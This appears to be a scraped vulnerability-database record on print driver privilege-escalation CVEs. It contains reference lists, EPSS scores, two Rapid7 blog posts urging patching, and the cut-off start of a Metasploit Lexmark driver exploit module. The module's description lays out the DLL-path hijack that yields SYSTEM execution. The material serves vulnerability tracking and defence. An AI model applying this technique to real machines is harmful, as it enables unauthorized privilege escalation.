"SMB_NT_MS20_JUN_4561612.NASL", "SMB_NT_MS20_JUN_4561616.NASL", "SMB_NT_MS20_JUN_4561621.NASL", "SMB_NT_MS20_JUN_4561643.NASL", "SMB_NT_MS20_JUN_4561649.NASL", "SMB_NT_MS20_JUN_4561666.NASL", "SMB_NT_MS20_JUN_4561670.NASL", "SMB_NT_MS21_AUG_5005030.NASL", "SMB_NT_MS21_AUG_5005031.NASL", "SMB_NT_MS21_AUG_5005043.NASL", "SMB_NT_MS21_AUG_5005089.NASL", "SMB_NT_MS21_AUG_5005094.NASL", "SMB_NT_MS21_AUG_5005095.NASL", "SMB_NT_MS21_AUG_5005106.NASL", "WINDOWS_RESTRICTDRIVERINSTALLATIONTOADMINISTRATORS_REG_CHECK.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310817063", "OPENVAS:1361412562310817140", "OPENVAS:1361412562310817141", "OPENVAS:1361412562310817142", "OPENVAS:1361412562310817143", "OPENVAS:1361412562310817144", "OPENVAS:1361412562310817145", "OPENVAS:1361412562310817146", "OPENVAS:1361412562310817157", "OPENVAS:1361412562310817158"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156251", "PACKETSTORM:163795", "PACKETSTORM:163811"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0273C620A27B80D02C6196B7E3DA3048", "QUALYSBLOG:0F0ACCA731E84F3B1067935E483FC950"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:3A2793FB5315EE3613661543700B783B", "RAPID7BLOG:5CDF95FB2AC31414FD390E0E0A47E057"]}, {"type": "securelist", "idList": ["SECURELIST:CE954DA57A5EE857B62F0E00D36A5003"]}, {"type": "thn", "idList": ["THN:3F83D0C001F2A9046C61A56F5ABE7695", "THN:6428957E9DED493169A2E63839F98667", "THN:C2D8045AAD8E4BA5A9168782138B6D52", "THN:CF5E93184467C7B8F56A517CE724ABCF", "THN:EDD5C9F076596EB9D13D36268BDBFAD1", "THN:F601EBBE359B3547B8E79F0217562FEF"]}, {"type": "threatpost", "idList": ["THREATPOST:8D4EA8B0593FD44763915E703BC9AB72", "THREATPOST:A8242348917526090B7A1B23735D5C6C", "THREATPOST:ADA9E95C8FD42722E783C74443148525", "THREATPOST:B2D0023D9A73CEE9C328A0927149D5B2"]}, {"type": "zdt", "idList": ["1337DAY-ID-33859", "1337DAY-ID-33926"]}]}, "score": {"value": -0.1, "vector": "NONE"}, "backreferences": {"references": [{"type": "avleonov", "idList": ["AVLEONOV:24538B1ED96269982136AA43998E5780"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-1058"]}, {"type": "cve", "idList": ["CVE-2019-19363", "CVE-2020-1300", "CVE-2021-38085"]}, {"type": "exploitdb", "idList": ["EDB-ID:47962", "EDB-ID:48036"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:CCA4761A63552664BBDE027DD8AD1FAE"]}, {"type": "githubexploit", "idList": ["5E52E412-B5BA-54D6-92C1-F70C151A8199"]}, {"type": "hivepro", "idList": ["HIVEPRO:1C413EFAC97AED19F9E35574668008F9"]}, {"type": "jvn", "idList": ["JVN:15697526"]}, {"type": "kaspersky", "idList": ["KLA11806", "KLA11807", "KLA12231", "KLA12246"]}, {"type": "krebs", "idList": ["KREBS:AE87E964E683A56CFE4E51E96F3530AD"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:9F3181D8BD5EF0E44A305AF69898B9E0"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/LOCAL/RICOH_DRIVER_PRIVESC"]}, {"type": "mscve", "idList": ["MS:CVE-2020-1300"]}, {"type": "mskb", "idList": ["KB5005033"]}, {"type": "nessus", "idList": ["SMB_NT_MS20_JUN_4560960.NASL", "SMB_NT_MS20_JUN_4561602.NASL", "SMB_NT_MS20_JUN_4561608.NASL", "SMB_NT_MS20_JUN_4561612.NASL", "SMB_NT_MS20_JUN_4561616.NASL", "SMB_NT_MS20_JUN_4561621.NASL", "SMB_NT_MS20_JUN_4561643.NASL", "SMB_NT_MS20_JUN_4561649.NASL", "SMB_NT_MS20_JUN_4561666.NASL", "SMB_NT_MS20_JUN_4561670.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310817140", "OPENVAS:1361412562310817141", "OPENVAS:1361412562310817143", "OPENVAS:1361412562310817144", "OPENVAS:1361412562310817145", "OPENVAS:1361412562310817146", "OPENVAS:1361412562310817157", "OPENVAS:1361412562310817158"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156251", "PACKETSTORM:163795", "PACKETSTORM:163811"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0273C620A27B80D02C6196B7E3DA3048", "QUALYSBLOG:0F0ACCA731E84F3B1067935E483FC950"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:3A2793FB5315EE3613661543700B783B", "RAPID7BLOG:5CDF95FB2AC31414FD390E0E0A47E057"]}, {"type": "securelist", "idList": ["SECURELIST:CE954DA57A5EE857B62F0E00D36A5003"]}, {"type": "thn", "idList": ["THN:3F83D0C001F2A9046C61A56F5ABE7695", "THN:6428957E9DED493169A2E63839F98667", "THN:EDD5C9F076596EB9D13D36268BDBFAD1", "THN:F601EBBE359B3547B8E79F0217562FEF"]}, {"type": "threatpost", "idList": ["THREATPOST:8D4EA8B0593FD44763915E703BC9AB72", "THREATPOST:ADA9E95C8FD42722E783C74443148525", "THREATPOST:B2D0023D9A73CEE9C328A0927149D5B2"]}, {"type": "zdt", "idList": ["1337DAY-ID-33859", "1337DAY-ID-33926"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2019-19363", "epss": 0.00071, "percentile": 0.29104, "modified": "2023-05-03"}, {"cve": "CVE-2020-1300", "epss": 0.05216, "percentile": 0.91798, "modified": "2023-05-03"}, {"cve": "CVE-2021-34481", "epss": 0.00662, "percentile": 0.76646, "modified": "2023-05-03"}, {"cve": "CVE-2021-35449", "epss": 0.00114, "percentile": 0.43609, "modified": "2023-05-03"}, {"cve": "CVE-2021-38085", "epss": 0.00053, "percentile": 0.18808, "modified": "2023-05-03"}], "vulnersScore": -0.1}, "_state": {"dependencies": 1685464390, "score": 1685458448, "epss": 0}, "_internal": {"score_hash": "c138ee7c4318f70415573e273a93670a"}, "toolHref": "https://github.com/jacob-baines/concealed_position"}
{"rapid7blog": [{"lastseen": "2021-08-13T19:00:30", "description": "## Print Driver PrivEsc\n\n\n\nIf you attended DEF CON last week, you may have seen [this talk on print driver vulnerabilities](<https://www.youtube.com/watch?v=vdesswZYz-8>) from Metasploit community contributor [Jacob Baines](<https://github.com/jacob-baines>). In the spirit of Friday the 13th, we're highlighting some of these "print nightmares" again, in the form of two new Metasploit modules that Jacob added. \nThe first is a [Canon TR150 Print Driver Local Privilege Escalation module](<https://github.com/rapid7/metasploit-framework/pull/15520>), which exploits [CVE-2021-38085](<https://attackerkb.com/topics/m8dOqLxPtb/cve-2021-38085?referrer=blog>). The second is a [Lexmark Universal Print Driver Local Privilege Escalation](<https://github.com/rapid7/metasploit-framework/pull/15519>) module, which exploits [CVE-2021-35449](<https://attackerkb.com/topics/9sV2bS0OSj/cve-2021-35449?referrer=blog>). Both modules target Windows systems with their respective vulnerable print drivers installed, and result in privilege escalation to a `SYSTEM` user.\n\n## Atlassian Crowd RCE\n\nAlso new in this week's release is an [Atlassian Crowd pdkinstall Unauthenticated Plugin Upload RCE module](<https://github.com/rapid7/metasploit-framework/pull/15501>) by Rapid7's own [Grant Willcox](<https://github.com/gwillcox-r7>), which exploits [CVE-2019-11580](<https://attackerkb.com/topics/ibknVO2p8H/cve-2019-11580?referrer=blog>). This vulnerability allows an attacker to upload arbitrary plugins to vulnerable Atlassian Crowd data servers and achieve unauthenticated remote code execution. This module also includes a check method for verifying whether a target is vulnerable to this exploit. It should be noted that this vulnerability made the U.S. Cybersecurity and Infrastructure Security Agency\u2019s (CISA) list of the [12 most routinely exploited vulns for 2020](<https://us-cert.cisa.gov/ncas/alerts/aa21-209a>)).\n\n## New module content (3)\n\n * [Atlassian Crowd pdkinstall Unauthenticated Plugin Upload RCE](<https://github.com/rapid7/metasploit-framework/pull/15501>) by Corben Leo, Grant Willcox, and Paul, which exploits [CVE-2019-11580](<https://attackerkb.com/topics/ibknVO2p8H/cve-2019-11580?referrer=blog>) \\- This adds an exploit for CVE-2019-11580 which is an unauthenticated RCE within the Atlassian Crowd application. The vulnerability allows for a malicious JAR file to be loaded, resulting in arbitrary Java code execution within the context of the service.\n * [Canon Driver Privilege Escalation](<https://github.com/rapid7/metasploit-framework/pull/15520>) by Jacob Baines and Shelby Pace, which exploits [CVE-2021-38085](<https://attackerkb.com/topics/m8dOqLxPtb/cve-2021-38085?referrer=blog>) \\- A new module has been added to exploit CVE-2021-38085, a privilege escalation issue in the Canon TR150 Print Driver. Successful exploitation results in code execution as the `SYSTEM` user.\n * [Lexmark Driver Privilege Escalation](<https://github.com/rapid7/metasploit-framework/pull/15519>) by Grant Willcox, Jacob Baines, and Shelby Pace, which exploits [CVE-2021-35449](<https://attackerkb.com/topics/9sV2bS0OSj/cve-2021-35449?referrer=blog>) \\- A new module has been added to exploit CVE-2021-35449, a privilege escalation issue in a variety of Lexmark drivers including the Universal Print Driver. Successful exploitation allows local attackers to gain `SYSTEM` level code execution.\n\n## Enhancements and features\n\n * [#15327](<https://github.com/rapid7/metasploit-framework/pull/15327>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Fixes a regression issue in the RPC analyze command. Adds automated integration tests to ensure it doesn't break in the future.\n * [#15430](<https://github.com/rapid7/metasploit-framework/pull/15430>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This adds support for SSH pivoting by adding a new Command Shell session type for SSH clients. This also updates both `auxiliary/scanner/ssh/ssh_login` and `auxiliary/scanner/ssh/ssh_login_pubkey` modules to include these changes. Note that it only supports TCP client connections and only outbound payloads can be used through the SSH pivot at the moment (no reverse payloads).\n * [#15493](<https://github.com/rapid7/metasploit-framework/pull/15493>) from [jmartin-r7](<https://github.com/jmartin-r7>) \\- Updated Metasploit's dependency on Rails from version 5.2 to 6.1\n * [#15523](<https://github.com/rapid7/metasploit-framework/pull/15523>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This enhances the console output with additional information on why a session may not be compatible with a post module, such as missing Meterpreter commands.\n * [#15535](<https://github.com/rapid7/metasploit-framework/pull/15535>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- The `psexec` module has been updated to use the `SMBSHARE` option name instead of `SHARE` for better consistency across modules. Users can still use the old `SHARE` option if needed, however this should be considered deprecated.\n\n## Bugs fixed\n\n * [#15524](<https://github.com/rapid7/metasploit-framework/pull/15524>) from [pingport80](<https://github.com/pingport80>) \\- This fixes a localization-related issue in the `post/linux/gather/enum_network` module, caused by it searching for language-specific strings in the output to determine success.\n * [#15534](<https://github.com/rapid7/metasploit-framework/pull/15534>) from [timwr](<https://github.com/timwr>) \\- Fixes a regression issue in `post/multi/manage/shell_to_meterpreter` where the generated Powershell command length was greater than the limit of 8192 characters after string obfuscation was applied.\n * [#15536](<https://github.com/rapid7/metasploit-framework/pull/15536>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- The HiveNightmare module has been updated to correctly use the `INTERATIONS` option instead of the `NBRE_ITER` option when performing the loop to call `check_path()`. This fixes an issue where the module would hang whilst users were running it, and ensures the loop correctly terminates after a set number of iterations.\n * [#15542](<https://github.com/rapid7/metasploit-framework/pull/15542>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This fixes a regression with Meterpreter's initialize methods, which caused Meterpreter scripts to be broken.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requests 6.0.56...6.1.0](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-08-04T11%3A50%3A27%2B01%3A00..2021-08-12T17%3A57%3A38%2B01%3A00%22>)\n * [Full diff 6.0.56...6.1.0](<https://github.com/rapid7/metasploit-framework/compare/6.0.56...6.1.0>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2021-08-13T18:25:09", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11580", "CVE-2021-35449", "CVE-2021-38085"], "modified": "2021-08-13T18:25:09", "id": "RAPID7BLOG:3A2793FB5315EE3613661543700B783B", "href": "https://blog.rapid7.com/2021/08/13/metasploit-wrap-up-125/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-25T01:34:04", "description": "\n\n_See the `Updates` section at the end of this post for new information as it comes to light._\n\nWhether you attended virtually, IRL, or not at all, Black Hat and DEF CON have officially wrapped, and security folks\u2019 brains are replete with fresh information on new (and some not-so-new) vulnerabilities and exploit chains. The \u201chacker summer camp\u201d conferences frequently also highlight attack surface area that may _not_ be net-new \u2014 but that is subjected to renewed and redoubled community interest coming out of Vegas week. See Rapid7\u2019s summaries [here](<https://www.rapid7.com/blog/post/2021/08/05/black-hat-recap-1/>) and [here](<https://www.rapid7.com/blog/post/2021/08/06/black-hat-recap-2/>).\n\nHere\u2019s the specific attack surface area and a few of the exploit chains we\u2019re keeping our eye on right now:\n\n * Orange Tsai stole the show (as always) at Black Hat with a talk on fresh **Microsoft Exchange** attack surface area. All in all, Orange discussed CVEs from [what appears to be four separate attack chains](<https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html>) \u2014including the ProxyLogon exploit chain that made headlines when it hit exposed Exchange servers as a zero-day attack [back in March](<https://www.rapid7.com/blog/post/2021/03/03/mass-exploitation-of-exchange-server-zero-day-cves-what-you-need-to-know/>) and the \u201cProxyShell\u201d exploit chain, which debuted at Pwn2Own and targets three now-patched CVEs in Exchange. Exchange continues to be a critically important attack surface area, and defenders should keep patched on a top-priority or zero-day basis wherever possible.\n * Print spooler vulnerabilities continue to cause nightmares. DEF CON saw the release of new privilege escalation exploits for Windows Print Spooler, and Black Hat featured a talk by Sangfor Technologies researchers that chronicled both [new Windows Print Spooler vulnerabilities](<https://attackerkb.com/assessments/85a30c9a-e126-4ec0-bda4-d166e03c5390>) and past patch bypasses for vulns like CVE-2020-1048 (whose patch was bypassed three times). Given that many defenders are still trying to remediate the \u201cPrintNightmare\u201d vulnerability from several weeks ago, it\u2019s fair to say that Windows Print Spooler will remain an important attack surface area to prioritize in future Patch Tuesdays.\n * There\u2019s also a new vulnerability in Pulse Connect Secure VPNs that caught our attention \u2014 the vuln is actually a bypass for CVE-2020-8260, which came out last fall and evidently didn\u2019t completely fade away \u2014 despite the fact that it\u2019s authenticated and requires admin access. With CISA\u2019s warnings about APT attacks against Pulse Connect Secure devices, it\u2019s probably wise to patch CVE-2021-22937 quickly.\n * And finally, the SpecterOps crew gave a highly anticipated Black Hat talk on several new attack techniques that [abuse Active Directory Certificate Services](<https://posts.specterops.io/certified-pre-owned-d95910965cd2>) \u2014 something we covered previously in our summary of the [PetitPotam attack chain](<https://www.rapid7.com/blog/post/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/>). This is neat research for red teams, and it may well show up on blue teams\u2019 pentest reports.\n\n### Microsoft Exchange ProxyShell chain\n\n**Patches:** Available \n**Threat status:** Possible threat (at least one report of exploitation in the wild)\n\nIt goes without saying that Microsoft Exchange is a high-value, popular attack surface that gets constant attention from threat actors and researchers alike. That attention is increasing yet again after prominent security researcher Orange Tsai gave a talk at Black Hat USA last week revealing details on an attack chain first demonstrated at Pwn2Own. The chain, dubbed \u201cProxyShell,\u201d allows an attacker to take over an unpatched Exchange server. ProxyShell is similar to ProxyLogon (i.e., [CVE-2021-26855](<https://attackerkb.com/assessments/a5c77ede-3824-4176-a955-d6cf9a6a7417>) and [CVE-2021-27065](<https://attackerkb.com/assessments/74177979-e2ef-4078-9f91-993964292cfa>)), which continues to be popular in targeted attacks and opportunistic scans despite the fact that it was patched in March 2021.\n\nTwo of the three vulnerabilities used for ProxyShell were patched in April by Microsoft and the third was patched in July. As of August 9, 2021, private exploits have already been developed, and it\u2019s probably only a matter of time before public exploit code is released, which may allow for broader exploitation of the vulns in this attack chain (in spite of its complexity!). Rapid7 estimates that there are, at least, nearly 75,000 ProxyShell-vulnerable exchange servers online:\n\n\n\nWe strongly recommend that Exchange admins confirm that updates have been applied appropriately; if you haven\u2019t patched yet, you should do so immediately on an emergency basis.\n\nOne gotcha when it comes to Exchange administration is that Microsoft only releases security fixes for the [most recent Cumulative Update versions](<https://docs.microsoft.com/en-us/exchange/new-features/updates>), so it\u2019s vital to stay up to date with these quarterly releases in order to react quickly when new patches are published.\n\nProxyShell CVEs:\n\n * [CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207>)\n * [CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>)\n * [CVE-2021-34523\u200b](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523>)\n\n### Windows Print Spooler \u2014 and more printer woes\n\n**Patches:** Varies by CVE, mostly available \n**Threat status:** Varies by CVE, active and impending\n\nThe Windows Print Spooler was the subject of renewed attention after the premature disclosure of the PrintNightmare vulnerability earlier this summer, followed by new Black Hat and DEF CON talks last week. Among the CVEs discussed were a quartet of 2020 vulns (three of which were bypasses descended from CVE-2020-1048, which has been exploited in the wild since last year), three new remote code execution vulnerabilities arising from memory corruption flaws, and two new local privilege escalation vulnerabilities highlighted by researcher [Jacob Baines](<https://twitter.com/Junior_Baines>). Of this last group, one vulnerability \u2014 CVE-2021-38085 \u2014 remains unpatched.\n\nOn August 11, 2021, Microsoft assigned [CVE-2021-36958](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36958>) to the latest Print Spooler remote code execution vulnerability which appears to require local system access and user interaction. Further details are limited at this time. However, as mitigation, Microsoft is continuing to recommend stopping and disabling the Print Spooler service. Even after this latest zero-day vulnerability is patched, we strongly recommend leaving the Print Spooler service disabled wherever possible. Read Rapid7\u2019s [blog on PrintNightmare](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>) for further details and updates.\n\nWindows Print Spooler and related CVEs:\n\n * [CVE-2020-1048](<https://attackerkb.com/topics/QoQvwrIqEV/cve-2020-1048-windows-print-spooler-elevation-of-privilege-vulnerability?referrer=blog>) (elevation of privilege vuln in Windows Print Spooler presented at Black Hat 2020; exploited in the wild, Metasploit module available)\n * [CVE-2020-1337](<https://attackerkb.com/topics/mEEwlfrTK3/cve-2020-1337?referrer=blog>) (patch bypass for CVE-2020-1048; Metasploit module available)\n * [CVE-2020-17001](<https://attackerkb.com/topics/oGAzAwKy1N/cve-2020-17001?referrer=blog>) (patch bypass variant for CVE-2020-1048)\n * [CVE-2020-17014](<https://attackerkb.com/topics/N9XhrkViyk/cve-2020-17014?referrer=blog>) (patch bypass variant for CVE-2020-1048)\n * [CVE-2020-1300](<https://attackerkb.com/topics/43jdEqsVY1/cve-2020-1300?referrer=blog>) (local privilege escalation technique known as \u201c[EvilPrinter](<https://twitter.com/R3dF09/status/1271485928989528064>)\u201d presented at DEF CON 2020)\n * [CVE-2021-24088](<https://attackerkb.com/assessments/85a30c9a-e126-4ec0-bda4-d166e03c5390>) (new remote code execution vulnerability in the Windows local spooler, as presented at Black Hat 2021)\n * [CVE-2021-24077](<https://attackerkb.com/topics/wiyGYban1l/cve-2021-24077?referrer=blog>) (new remote code execution vulnerability in the Windows Fax Service, as presented at Black Hat 2021)\n * [CVE-2021-1722](<https://attackerkb.com/topics/v1Qm7veSwf/cve-2021-1722?referrer=blog>) (new remote code execution vulnerability in the Windows Fax Service, as presented at Black Hat 2021)\n * [CVE-2021-1675](<https://attackerkb.com/topics/dI1bxlM0ay/cve-2021-1675?referrer=blog>) (elevation of privilege vuln in Windows Print Spooler patched in June 2021)\n * [CVE-2021-34527](<https://attackerkb.com/topics/MIHLz4sY3s/cve-2021-34527-printnightmare?referrer=blog>), aka \u201cPrintNightmare\u201d\n * [CVE-2021-35449](<https://attackerkb.com/topics/9sV2bS0OSj/cve-2021-35449?referrer=blog>) (print driver local privilege escalation vulnerability, as [presented](<https://www.youtube.com/watch?v=vdesswZYz-8>) at DEF CON 2021; Metasploit module in progress)\n * [CVE-2021-38085](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38085>) (**unpatched** print driver local privilege escalation vulnerability, as [presented](<https://www.youtube.com/watch?v=vdesswZYz-8>) at DEF CON 2021; Metasploit module in progress)\n * [CVE-2021-36958](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36958>) (**unpatched** remote code execution vulnerability; announced August 11, 2021)\n\nCurrently, both [PrintNightmare](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>) CVE-2021-34527 and CVE-2020-1048 are known to be exploited in the wild. As the list above demonstrates, patching print spooler and related vulns quickly and completely has been a challenge for Microsoft for the past year or so. The multi-step mitigations required for some vulnerabilities also give attackers an advantage. Defenders should harden printer setups wherever possible, including against malicious driver installation.\n\n### Pulse Connect Secure CVE-2021-22937\n\n**Patch:** Available \n**Threat status:** Impending (Exploitation expected soon)\n\nOn Monday, August 2, 2021, Ivanti published [Security Advisory SA44858](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44858>) which, among other fixes, includes a fix for CVE-2021-22937 for Pulse Connect Secure VPN Appliances running 9.1R11 or prior. Successful exploitation of this vulnerability, which carries a CVSSv3 score of 9.1, requires the use of an authenticated administrator account to achieve remote code execution (RCE) as user `root`.\n\nPublic proof-of-concept (PoC) exploit code has not been released as of this writing. However, this vulnerability is simply a workaround for [CVE-2020-8260](<https://blog.rapid7.com/2021/08/12/popular-attack-surfaces-august-2021-what-you-need-to-know/%E2%80%8B%E2%80%8Bhttps://attackerkb.com/topics/MToDzANCY4/cve-2020-8260?referrer=search#vuln-details>), an authentication bypass vulnerability that was heavily utilized by attackers, released in October 2020.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) has been monitoring the [Exploitation of Pulse Connect Secure Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa21-110a>) demonstrating that attackers have been targeting Ivanti Pulse Connect Secure products for over a year. Due to attacker focus on Pulse Connect Secure products, and especially last year\u2019s CVE-2020-8260, Rapid7 recommends patching CVE-2021-22937 as soon as possible.\n\n### PetitPotam: Windows domain compromise\n\n**Patches:** Available \n**Threat status:** Threat (Exploited in the wild)\n\nIn July 2021, security researcher [Topotam](<https://github.com/topotam>) published a [PoC implementation](<https://github.com/topotam/PetitPotam>) of a novel NTLM relay attack christened \u201cPetitPotam.\u201d The technique used in the PoC allows a remote, unauthenticated attacker to completely take over a Windows domain with the Active Directory Certificate Service (AD CS) running \u2014 including domain controllers. Rapid7 researchers have tested public PoC code against a Windows domain controller setup and confirmed exploitability. One of our [senior researchers](<https://twitter.com/wvuuuuuuuuuuuuu>) summed it up with: "This attack is too easy." You can read Rapid7\u2019s full blog post [here](<https://www.rapid7.com/blog/post/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/>).\n\nOn August 10, 2021, Microsoft released a patch that addresses the PetitPotam NTLM relay attack vector in today's Patch Tuesday. Tracked as [CVE-2021-36942](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942>), the August 2021 Patch Tuesday security update blocks the affected API calls [OpenEncryptedFileRawA](<https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-openencryptedfilerawa>) and [OpenEncryptedFileRawW](<https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-openencryptedfileraww>) through the LSARPC interface. Windows administrators should prioritize patching domain controllers and will still need to take additional steps listed in [KB5005413](<https://support.microsoft.com/en-us/topic/kb5005413-mitigating-ntlm-relay-attacks-on-active-directory-certificate-services-ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429>) to ensure their systems are fully mitigated.\n\n### Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to the vulnerabilities in this post with authenticated vulnerability checks. Please note that details haven\u2019t yet been released on CVE-2021-38085 and CVE-2021-36958; therefore, it\u2019s still awaiting analysis and check development.\n\n### Updates\n\n**Pulse Connect Secure CVE-2021-22937** \nOn August 24, 2021, the Cybersecurity & Infrastructure Security Agency (CISA) released [Malware Analysis Report (AR21-236E)](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-236e>) which includes indicators of compromise (IOCs) to assist with Pulse Connect Secure investigations.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-12T17:13:25", "type": "rapid7blog", "title": "Popular Attack Surfaces, August 2021: What You Need to Know", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1048", "CVE-2020-1300", "CVE-2020-1337", "CVE-2020-17001", "CVE-2020-17014", "CVE-2020-8260", "CVE-2021-1675", "CVE-2021-1722", "CVE-2021-22937", "CVE-2021-24077", "CVE-2021-24088", "CVE-2021-26855", "CVE-2021-27065", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35449", "CVE-2021-36942", "CVE-2021-36958", "CVE-2021-38085"], "modified": "2021-08-12T17:13:25", "id": "RAPID7BLOG:5CDF95FB2AC31414FD390E0E0A47E057", "href": "https://blog.rapid7.com/2021/08/12/popular-attack-surfaces-august-2021-what-you-need-to-know/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2021-08-12T16:10:26", "description": "", "cvss3": {}, "published": "2021-08-12T00:00:00", "type": "packetstorm", "title": "Lexmark Driver Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-35449"], "modified": "2021-08-12T00:00:00", "id": "PACKETSTORM:163811", "href": "https://packetstormsecurity.com/files/163811/Lexmark-Driver-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = NormalRanking \n \ninclude Msf::Post::File \ninclude Msf::Exploit::EXE \ninclude Msf::Post::Windows::Priv \ninclude Msf::Exploit::FileDropper \nprepend Msf::Exploit::Remote::AutoCheck \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Lexmark Driver Privilege Escalation', \n'Description' => %q{ \nVarious Lexmark Universal Printer drivers as listed at advisory TE953 \nallow low-privileged authenicated users to elevate their privileges to \nSYSTEM on affected Windows systems by modifying the XML file at \nC:\\ProgramData\\<driver name>\\Universal Color Laser.gdl \nto replace the DLL path to unires.dll with a malicious DLL path. \n \nWhen C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\prnmngr.vbs is \nthen used to add the printer to the affected system, PrintIsolationHost.exe, \na Windows process running as NT AUTHORITY\\SYSTEM, will inspect the \nC:\\ProgramData\\<driver name>\\Universal Color Laser.gdl file and will \nload the malicious DLL from the path specified in the file. This which will \nresult in the malicious DLL executing as NT AUTHORITY\\SYSTEM. \n \nOnce this module is finished, it will use the prnmngr.vbs script \nto remove the printer it added. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'Jacob Baines', # discovery, PoC, module \n'Shelby Pace', # original Ricoh driver module \n'Grant Willcox' # module \n], \n'References' => \n[ \n[ 'CVE', 